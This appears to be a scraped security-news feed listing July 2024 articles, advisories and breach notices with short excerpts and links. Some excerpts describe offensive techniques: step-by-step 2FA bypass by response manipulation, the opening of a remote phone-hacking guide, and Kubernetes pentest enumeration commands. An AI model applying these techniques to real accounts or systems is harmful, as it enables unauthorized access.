Written by CSA Research Analysts Marina Bregkou and Josh Buker.Based on the idea presented by Nico Popp in ‘A trust API to enable large language models observability & security (LLMs)'.IntroductionLarge Language Models (LLMs) are becoming integral to numerous applications, from chatbots to complex data analysis tools, in our rapidly evolving world of Artificial Intelligence (AI). The increased adoption of LLMs brings forth significant challenges in terms of security, observability, and t...
https://cloudsecurityalliance.org/articles/enhancing-ai-reliability-introducing-the-llm-observability-trust-api
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Defending Against APTs: A Learning Exercise with Kimsuky
The latest research paper coming out of Rapid7 Labs examines the tactics of North Korea's Kimsuky threat group.
https://blog.rapid7.com/2024/07/16/defending-against-apts-a-learning-exercise-with-kimsuky/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DarkGate, the Swiss Army knife of malware, sees boom after rival Qbot crushed
https://www.proofpoint.com/us/newsroom/news/darkgate-swiss-army-knife-malware-sees-boom-after-rival-qbot-crushed
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Purview Data Governance will be generally available September 1, 2024
Microsoft Purview Data Governance will become generally available to enterprise customers on September 1, 2024. It helps today's data leaders solve their key data governance and security challenges in one unified AI-powered and business-friendly solution.
The post Microsoft Purview Data Governance will be generally available September 1, 2024 appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/16/microsoft-purview-data-governance-will-be-generally-available-september-1-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI device Rabbit r1 logged user interactions without an option to erase them before selling
Rabbit has introduced an option to erase all data from the r1 device before selling it on, but what if you lose it or it gets stolen?
https://www.malwarebytes.com/blog/news/2024/07/ai-device-rabbit-r1-logged-user-interactions-without-an-option-to-erase-them-before-selling-device
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2024 DDoS Attack Trends
Unveiling the rise of Hacktivism in a tense global climate.
https://www.f5.com/labs/articles/threat-intelligence/2024-ddos-attack-trends
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Announcing The State of GitHub Actions Security Report
Get details on Legit's research on the security of GitHub Actions.
https://www.legitsecurity.com/blog/announcing-the-state-of-github-actions-security-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Beware of BadPack: One Weird Trick Being Used Against Android Devices
Our data shows a pattern of APK malware bundled as BadPack files. We discuss how this technique is used to garble malicious Android files, creating challenges for analysts.
The post Beware of BadPack: One Weird Trick Being Used Against Android Devices appeared first on Unit 42.
https://unit42.paloaltonetworks.com/apk-badpack-malware-tampered-headers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Brain Cipher Ransomware Attack
What is the attack?A significant ransomware attack has struck Pusat Data Nasional (PDN), one of Indonesia's government-owned national data centers. This incident involved threat actors encrypting government data, which disrupted digital services for immigration, airport checks, and several public services.. This ransomware attack represents a new variant of the LockBit 3.0 ransomware. In 2023, the LockBit hacker group also severely disrupted the Bank Syariah Indonesia (BSI) systems.What is the recommended Mitigation?Ensure that all systems are up to date with robust cybersecurity measures. Also, maintain general awareness and training about the risk of phishing and social engineering attacks in the organization. What FortiGuard Coverage is available?FortiGuard Labs has AV signatures to block...
https://fortiguard.fortinet.com/threat-signal-report/5479
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
10 Years of the GitHub Security Bug Bounty Program
Celebrating 10 years of GitHub's bug bounty program! Learn insights into bug bounty growth from a top program.
https://www.hackerone.com/customer-stories/10-years-github-security-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
WinRM Penetration Testing
Windows Remote Management (WinRM) is a protocol developed by Microsoft for remotely managing hardware and operating systems on Windows machines. It is a component of
The post WinRM Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/winrm-penetration-testing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The 2024 MES Midmarket 100: Top Companies Serving The Midmarket
https://www.proofpoint.com/us/newsroom/news/2024-mes-midmarket-100-top-companies-serving-midmarket
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How an AI “artist” stole a woman's face, with Ali Diamond (Lock and Code S05E15)
This week on the Lock and Code podcast, we speak with Ali Diamond about what it felt like to find an AI image model of herself online.
https://www.malwarebytes.com/blog/podcast/2024/07/how-an-ai-artist-stole-a-womans-face-with-ali-diamond-lock-and-code-s05e15
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Researchers: Weak Security Defaults Enabled Squarespace Domains Hijacks
At least a dozen organizations with domain names at domain registrar Squarespace saw their websites hijacked last week. Squarespace bought all assets of Google Domains a year ago, but many customers still haven't set up their new accounts. Experts say malicious hackers learned they could commandeer any migrated Squarespace accounts that hadn't yet been registered, merely by supplying an email address tied to an existing domain.
https://krebsonsecurity.com/2024/07/researchers-weak-security-defaults-enabled-squarespace-domains-hijacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
With Security Teams Understaffed, Here's How to Maintain a Solid Posture
IT security teams are facing a serious labor shortage, which risks compromising their organizations' security…
With Security Teams Understaffed, Here's How to Maintain a Solid Posture on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/with-security-teams-understaffed-heres-how-to-maintain-a-solid-posture/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybersecurity crisis communication: What to do
Cybersecurity experts tell organizations that the question is not if they will become the target of a cyberattack but when. Often, the focus of response preparedness is on the technical aspects — how to stop the breach from continuing, recovering data and getting the business back online. While these tasks are critical, many organizations overlook […]
The post Cybersecurity crisis communication: What to do appeared first on Security Intelligence.
https://securityintelligence.com/articles/cybersecurity-crisis-communication-what-to-do/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary.
But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protecting Trained Models in Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . The last two posts in our series covered techniques for input privacy in privacy-preserving federated learning in the context of horizontally and vertically partitioned data. To build a complete privacy-preserving federated learning
https://www.nist.gov/blogs/cybersecurity-insights/protecting-trained-models-privacy-preserving-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hello, is it me you're looking for? How scammers get your phone number
Your humble phone number is more valuable than you may think. Here's how it could fall into the wrong hands – and how you can help keep it out of the reach of fraudsters.
https://www.welivesecurity.com/en/scams/hello-is-it-me-youre-looking-for-how-scammers-get-your-phone-number/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability In Modern Events Calendar WordPress Plugin Actively Exploited
WordPress admins running the Modern Events Calendar plugin on their websites must rush to update…
Vulnerability In Modern Events Calendar WordPress Plugin Actively Exploited on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/vulnerability-in-modern-events-calendar-wordpress-plugin-actively-exploited/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers Exploited Windows MSHTML Vulnerability For Over A Year
Researchers revealed that the recently patched Windows MSHTML vulnerability remained under attack for over a…
Hackers Exploited Windows MSHTML Vulnerability For Over A Year on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/hackers-exploited-windows-mshtml-vulnerability-for-over-a-year/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Announced 5x Raise In Its Bug Bounty Program Rewards
A lucrative opportunity to win hefty bounties has arrived for security researchers. Google has increased…
Google Announced 5x Raise In Its Bug Bounty Program Rewards on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/google-announced-5x-raise-in-its-bug-bounty-program-rewards/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Crooks Steal Phone, SMS Records for Nearly All AT&T Customers
AT&T Corp. disclosed today that a new data breach has exposed phone call and text message records for roughly 110 million people -- nearly all of its customers. AT&T said it delayed disclosing the incident in response to "national security and public safety concerns," noting that some of the records included data that could be used to determine where a call was made or text message sent. AT&T also acknowledged the customer records were exposed in a cloud database that was protected only by a username and password (no multi-factor authentication needed).
https://krebsonsecurity.com/2024/07/hackers-steal-phone-sms-records-for-nearly-all-att-customers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Metasploit Weekly Wrap-Up 07/12/2024
This week's release features two new exploits targeting Confluence & Ivanti -CVE-2024-21683 and CVE-2024-29824. Learn more!
https://blog.rapid7.com/2024/07/12/metasploit-weekly-wrap-up-07-12-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Brands are changing cybersecurity strategies due to AI threats
Over the past 18 months, AI has changed how we do many things in our work and professional lives — from helping us write emails to affecting how we approach cybersecurity. A recent Voice of SecOps 2024 study found that AI was a huge reason for many shifts in cybersecurity over the past 12 months. […]
The post Brands are changing cybersecurity strategies due to AI threats appeared first on Security Intelligence.
https://securityintelligence.com/articles/brands-changing-cybersecurity-strategies-due-to-ai-threats/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Should ransomware payments be banned? – Week in security with Tony Anscombe
Blanket bans on ransomware payments are a much-debated topic in cybersecurity and policy circles. What are the implications of outlawing the payments, and would the ban be effective?
https://www.welivesecurity.com/en/videos/should-ransomware-payments-be-banned-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Feedback-Driven Interviewing at HackerOne
https://www.hackerone.com/culture-and-talent/feedback-driven-interviewing-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What HackerOne Customers Say About the Problems Hackers Solve
Learn why organizations work with ethical hackers, like preventing breaches, meeting regulatory compliance, and helping the security budget.
https://www.hackerone.com/customer-stories/hackers-solve-problems
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Have you been texted a suspiciously good job offer?
https://www.proofpoint.com/us/newsroom/news/have-you-been-texted-suspiciously-good-job-offer
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Simplified Zero Trust security with the Microsoft Entra Suite and unified security operations platform, now generally available
Microsoft is announcing the Microsoft Entra Suite and the unified security operations platform, two innovations that simplify the implementation of your Zero Trust security strategy.
The post Simplified Zero Trust security with the Microsoft Entra Suite and unified security operations platform, now generally available appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/11/simplified-zero-trust-security-with-the-microsoft-entra-suite-and-unified-security-operations-platform-now-generally-available/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What's New in Rapid7 Products & Services: Q2 2024 in Review
In Q2, we focused on enhancing visualization, prioritization, and integration capabilities across our key products and services.
https://blog.rapid7.com/2024/07/11/whats-new-in-rapid7-products-services-q2-2024-in-review/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
39% of MSPs report major setbacks when adapting to advanced security technologies
SOPHOS, a leading global provider of managed security solutions, has recently released its annual MSP Perspectives report for 2024. This most recent report provides insights from 350 different managed service providers (MSPs) across the United States, United Kingdom, Germany and Australia on modern cybersecurity tools solutions. It also documents newly discovered risks and challenges in […]
The post 39% of MSPs report major setbacks when adapting to advanced security technologies appeared first on Security Intelligence.
https://securityintelligence.com/articles/msps-report-setbacks-adapting-advanced-security-technologies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Beware Of Scam Olympics Ticket Websites, Fans Warned
https://www.proofpoint.com/us/newsroom/news/beware-scam-olympics-ticket-websites-fans-warned
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When spear phishing met mass phishing
Kaspersky experts have discovered a new scheme that combines elements of spear and mass phishing
https://securelist.com/spear-phishing-meets-mass/113125/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DarkGate: Dancing the Samba With Alluring Excel Files
We perform an in-depth study of a DarkGate malware campaign exploiting Excel files from early this year, assessing its functionality and its C2 traffic.
The post DarkGate: Dancing the Samba With Alluring Excel Files appeared first on Unit 42.
https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Stark Truth Behind the Resurgence of Russia's Fin7
The Russia-based cybercrime group dubbed "Fin7," known for phishing and malware attacks that have cost victim organizations an estimated billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024 -- setting up thousands of websites mimicking a range of media and technology companies -- with the help of Stark Industries Solutions, a sprawling hosting provider is a persistent source of cyberattacks against enemies of Russia.
https://krebsonsecurity.com/2024/07/the-stark-truth-behind-the-resurgence-of-russias-fin7/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pentesting for Web Applications
Learn testing methodologies, common vulnerabilities, and best practices for pentesting web applications with PTaaS.
https://www.hackerone.com/penetration-testing/web-applications
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Takeaways From The Take Command Summit: Unlocking ROI in Security
Rapid7 CMO Cindy Stanton hosted a discussions with Cindy Stanton, Byron Anderson and Gaël Frouin to talk strategies for measuring team performance at Rapid7's recent Take Command summit.
https://blog.rapid7.com/2024/07/10/takeaways-from-the-take-command-summit-unlocking-roi-in-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds.
Sponsored ads can often be beneficial as they are customized to suit online
personas, offering relevant content tailored specifically for you. While
personalized ads can help enhance your online experience, not all are
legitimate. In fact, scams originating from phony ads on social media have
increased dramatically, with potentially severe consequences for consumers.
Sponsored supplement scams on social media platforms
H
https://www.bitdefender.com/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Digital solidarity vs. digital sovereignty: Which side are you on?
The landscape of international cyber policy continues to evolve rapidly, reflecting the dynamic nature of technology and global geopolitics. Central to this evolution are two competing concepts: digital solidarity and digital sovereignty. The U.S. Department of State, through its newly released International Cyberspace and Digital Policy Strategy, has articulated a clear preference for digital solidarity, […]
The post Digital solidarity vs. digital sovereignty: Which side are you on? appeared first on Security Intelligence.
https://securityintelligence.com/articles/digital-solidarity-vs-digital-sovereignty/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Understanding IoT security risks and how to mitigate them | Cybersecurity podcast
As security challenges loom large on the IoT landscape, how can we effectively counter the risks of integrating our physical and digital worlds?
https://www.welivesecurity.com/en/videos/understanding-iot-security-risks-mitigate-cybersecurity-podcast/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Heritage Foundation - 72,004 breached accounts
In July 2024, hacktivists published almost 2GB of data taken from The Heritage Foundation and their media arm, The Daily Signal. The data contained 72k unique email addresses, primarily used for commenting on articles (along with names, IP addresses and the comments left) and by content contributors (along with usernames and passwords stored as either MD5 or phpass hashes).
https://haveibeenpwned.com/PwnedWebsites#TheHeritageFoundation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Distribution of AsyncRAT Disguised as Ebook
1. Overview AhnLab SEcurity intelligence Center (ASEC) covered cases of AsyncRAT being distributed via various file extensions (.chm, .wsf, and .lnk). [1] [2] In the aforementioned blog posts, it can be seen that the threat actor used normal document files disguised as questionnaires to conceal the malware. In a similar vein, there have been cases recently where the malware was disguised as an ebook. 2. Malware Executed via Scripts The compressed file disguised as an ebook contains a malicious LNK file disguised...
The post Distribution of AsyncRAT Disguised as Ebook appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67861/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Patch Tuesday, July 2024 Edition
Microsoft Corp. today issued software updates to plug 139 security holes in various flavors of Windows and other Microsoft products. Redmond says attackers are already exploiting at least two of the vulnerabilities in active attacks against Windows users.
https://krebsonsecurity.com/2024/07/microsoft-patch-tuesday-july-2024-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Neiman Marcus - 31,152,842 breached accounts
In May 2024, the American luxury retailer Neiman Marcus suffered a data breach which was later posted to a popular hacking forum. The data included 31M unique email addresses, names, phone numbers, dates of birth, physical addresses and partial credit card data (note: this is insufficient to make purchases). The breach was traced back to a series of attacks against the Snowflake cloud service which impacted 165 organisations worldwide.
https://haveibeenpwned.com/PwnedWebsites#NeimanMarcus
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Developing and prioritizing a detection engineering backlog based on MITRE ATT&CK
How a SOC can efficiently manage priorities when writing detection logic for various MITRE ATT&CK techniques and what tools can help.
https://securelist.com/detection-engineering-backlog-prioritization/113099/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A decade of global cyberattacks, and where they left us
The cyberattack landscape has seen monumental shifts and enormous growth in the past decade or so. I spoke to Michelle Alvarez, X-Force Strategic Threat Analysis Manager at IBM, who told me that the most visible change in cybersecurity can be summed up in one word: scale. A decade ago, “’mega-breaches’ were relatively rare, but now […]
The post A decade of global cyberattacks, and where they left us appeared first on Security Intelligence.
https://securityintelligence.com/articles/decade-global-cyberattacks-where-they-left-us/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Q1 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in the first quarter of 2024. In this period, I collected a total of 833 events (9.15 events/day) dominated by Cyber Crime with 75.2%...
https://www.hackmageddon.com/2024/07/09/q1-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
5 common Ticketmaster scams: How fraudsters steal the show
Scammers gonna scam scam scam, so before hunting for your tickets to a Taylor Swift gig or other in-demand events, learn how to stop fraudsters from leaving a blank space in your bank account
https://www.welivesecurity.com/en/scams/5-common-ticketmaster-scams-fraudsters-steal-show/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cross site scripting vulnerability in SSL VPN web UI
An improper neutralization of input during web page Generation vulnerability [CWE-79] in FortiOS and FortiProxy's web SSL VPN UI may allow a remote unauthenticated attacker to perform a Cross-Site Scripting attack via social engineering the targeted user into bookmarking a malicious samba server, then opening the bookmark.
https://fortiguard.fortinet.com/psirt/FG-IR-23-485
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FortiAIOps - CSV Injection in export device inventory feature
An improper neutralization of formula elements in a CSV File vulnerability [CWE-1236] in FortiAIOps may allow a remote authenticated attacker to execute arbitrary commands on a client's workstation via poisoned CSV reports.
https://fortiguard.fortinet.com/psirt/FG-IR-24-073
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FortiAIOps - Cross-site request forgery
Multiple cross-site request forgery (CSRF) vulnerabilities [CWE-352] in FortiAIOps may allow an unauthenticated remote attacker to perform arbitrary actions on behalf of an authenticated user via tricking the victim to execute malicious GET requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-070
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FortiAIOps - Improper Session Management
Multiple insufficient session expiration vulnerabilities [CWE-613] in FortiAIOps may allow an attacker to re-use stolen old session tokens to perform unauthorized operations via crafted requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-069
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FortiAIOps - Sensitive Information leak to an Unauthorized Actor
Multiple Exposure of sensitive information to an unauthorized actor vulnerabilities [CWE-200] may allow an authenticated attacker to retrieve sensitive information from the API endpoint or logs.
https://fortiguard.fortinet.com/psirt/FG-IR-24-072
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FortiOS - IP address validation mishandles zero characters
An incorrect parsing of numbers with different radices vulnerability [CWE-1389] in FortiOS and FortiProxy IP address validation feature may permit an unauthenticated attacker to bypass the IP blocklist via crafted requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-446
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Improper access control vulnerability in administrative interface
An improper access control vulnerability [CWE-284] in FortiADC may allow a read only authenticated attacker to perform some write actions via crafted HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-469
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Insecure Direct Object Reference in policy API Endpoint
An authorization bypass through user-controlled key vulnerability [CWE-639] in Fortiportal organization interface may allow an authenticated attacker to view resources of other organizations via HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-011
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Multiple lack of client-side certificate validation when establishing secure connections
An improper certificate validation vulnerability [CWE-295] in FortiADC may allow a remote and unauthenticated attacker to perform a Man-in-the-Middle attack on the communication channel between the device and various remote servers such as private SDN connectors and FortiToken Cloud.
https://fortiguard.fortinet.com/psirt/FG-IR-22-298
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OpenSSH regreSSHion Attack (CVE-2024-6387)
CVE-2024-6387A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This could lead to remote code execution with root privileges.
https://fortiguard.fortinet.com/psirt/FG-IR-24-258
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Privilege escalation from low privilege administrator
An improper access control vulnerability [CWE-284] in FortiExtender authentication component may allow a remote authenticated attacker to create users with elevated privileges via a crafted HTTP request.
https://fortiguard.fortinet.com/psirt/FG-IR-23-459
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Simple 2FA Bypass
2FA bypass through response manipulationTwo-Factor Authentication (2FA) serves as a robust shield against unauthorized access. However, during a recent engagement in a RVDP, I found a critical vulnerability that allows an attacker to bypass 2FA using response manipulation.Bug-bounty (zoom.us)Below are the steps that led to bypass 2FA:I logged-in as a normal user and enabled 2FA for that accountNext, I logged out and logged-in again with login credentialsThen I entered the wrong OTP and captured that response to that request as shown belowWrong OTP Response4. The response had 401 Unauthorized and the body had wrong OTP message5. I manipulated the response code to 200 OK and replaced the body with the content of valid OTPManipulated Response6. That's it, with this I was able to bypass...
https://infosecwriteups.com/a-simple-2fa-bypass-43c8af9006ec?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Data Profiling Reveals Why 39+ U.S. States Banned TikTok
Data Profiling Reveals Reasons Behind Over 39 States of USA Banning Chinese Tik-Tok App.Image by cottonbro studioThere is only one reason why more than 39 states of the USA have banned Tik-Tok by issuing official orders: the resolution to end this app's involvement in suspicious activity and data piracy.This app has allegedly stolen USA state citizens' data (according to Forbes) without their knowledge. Initially considered merely an allegation possibly related to the trade war,this accusation gained more credibility when it was realised that TikTok is operated in a country where citizen data is considered irrelevant.While this news may suffice for the average person, the intellectually curious undoubtedly wonder how. I will end your doubt on one condition: read this article until the end.Disclaimer:Neither...
https://infosecwriteups.com/data-profiling-reveals-why-39-u-s-states-banned-tiktok-4c64f968af7b?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BountyDork: Your Ultimate Automatic Dorking Testing Companion For Bug Bounty
Discover BountyDork, a powerful tool designed for penetration testers and cybersecurity researchers, offering automation, reporting, and…Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/bountydork-your-ultimate-automatic-dorking-testing-companion-for-bug-bounty-b2bd41cb7344?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RegreSSHion (CVE-2024–6387): Dive into the Latest OpenSSH Server Threat
Explore CVE-2024–6387, a critical cybersecurity vulnerability.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/regresshion-cve-2024-6387-dive-into-the-latest-openssh-server-threat-ba4a6e0983e4?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Do You Need To Know Coding In Cloud Security ??
My take on this commonly asked questionContinue reading on InfoSec Write-ups »
https://infosecwriteups.com/do-you-need-to-know-coding-in-cloud-security-3ee686c0c814?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Step-by-Step Guide on How to Hack Phone Remotely
Photo by Mika Baumeister on UnsplashIn the age of digital sophistication, questions like how to hack a phone or understanding the underlying vulnerabilities are becoming increasingly prevalent. With the evolution of technology, hacking techniques have become more sophisticated, targeting not just the individual's personal data but also encompassing malware attacks, phishing attempts, and unauthorized GPS tracking. This interest is often driven by concerns over security, a desire to understand potential risks, and the mechanisms to protect against them. It's crucial, however, to approach this information with an understanding of the ethical implications and strictly for educational purposes.This guide will delve into the essentials of how to hack a phone remotely, laying down a step-by-step...
https://infosecwriteups.com/step-by-step-guide-on-how-to-hack-phone-remotely-a8b1b8d13015?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Enabling Reproducible and Verification of Time to Network Protocol Testing
Discover the “Network Simulator-centric Compositional Testing” (NSCT) methodology, a groundbreaking approach destined to transform network…Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/unveiling-nsct-a-breakthrough-in-network-protocol-testing-b2356c2c7d70?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Art of finding zero day vulnerabilities using Open Source AI
I am Harish SG, a security researcher who studies Masters in Cybersecurity at UT Dallas and AI security engineer at Cisco,previously hunted on the Microsoft Bug Bounty Program and Google VRPI am sharing this article for security awareness and educational purposes only and I am sharing only personal opinions and none of these are related to my work at Cisco.In this article I am gonna share how I used an Opensource AI model finetuned for finding vulnerabilities called codeastra-7B to idenify zero day vulnerabilities in various opensource project such as apache pulsar , apache airflow , apache cocoon , tensorflow , imagemagik etc and how to build a framwork which combines both static analysis tools such as semgrep and AI agents built on top of opensource models such as CodeAstra-7B to find...
https://infosecwriteups.com/art-of-finding-zero-day-vulnerabilities-using-open-source-ai-e26eaaf323cb?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unlocking Kubernetes Security: The Complete Checklist
Kubernetes has quickly become the go-to system for managing containerized apps, making it a massive playground for both deploying cool apps and, unfortunately, encountering some not-so-cool security gaps.In this write-up, we're going to explore the world of Kubernetes pentesting, presenting a comprehensive checklist that serves as your guiding light through the dark corners of Kubernetes environments.Entry Points into the cluster#The Kubernetes API server is the main point of entry to a cluster for external parties.1)NodePort and LoadBalancer Service▶k get svc -A2)hostPort▶k describe pod <pod>#Pods can be directly exposed via hostPort. This is not the recommended way of exposing a pod3)Ingress Paths▶kubectl get ingress -A -o=jsonpath='{range .items[*]}{@.metadata.name}{"\n"}{range...
https://infosecwriteups.com/unlocking-kubernetes-security-the-complete-checklist-538fff3adacf?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DORA: What You Need to Know
Learn about DORA, the new EU regulation for digital operational resilience, and how to meet the requirements with pentesting.
https://www.hackerone.com/penetration-testing/dora
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What You Need to Know About the EU Cyber Resilience Act
Understand what the CRA entails and how to comply.
https://www.legitsecurity.com/blog/what-you-need-to-know-about-the-eu-cyber-resilience-act
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New APT Group "CloudSorcerer" Targets Russian Government Entities
https://www.proofpoint.com/us/newsroom/news/new-apt-group-cloudsorcerer-targets-russian-government-entities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […]
The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CloudSorcerer – A new APT targeting Russian government entities
Kaspersky discovered a new APT CloudSorcerer targeting Russian government entities and using cloud services as C2, just like the CloudWizard actor.
https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Husky Owners - 16,502 breached accounts
In July 2024, the Husky Owners forum website was defaced and linked to a breach of user data containing 16k records. The exposed data included usernames, email addresses, dates of birth and time zones.
https://haveibeenpwned.com/PwnedWebsites#HuskyOwners
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FNTECH - 10,386 breached accounts
In July 2024, the events management platform FNTECH suffered a data breach that exposed 10k unique email addresses. The data contained registrants from various events, including participants of the Roblox Developer Conference registration list. The data also included names and IP addresses.
https://haveibeenpwned.com/PwnedWebsites#RobloxDeveloperConference2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MSSQL for Pentester: Command Execution with xp_cmdshell
Transact-SQL (T-SQL) is an extension of the SQL language used primarily in Microsoft SQL Server. T-SQL expands the functionality of SQL by adding procedural programming
The post MSSQL for Pentester: Command Execution with xp_cmdshell appeared first on Hacking Articles.
https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Kimsuky Group's New Backdoor (HappyDoor)
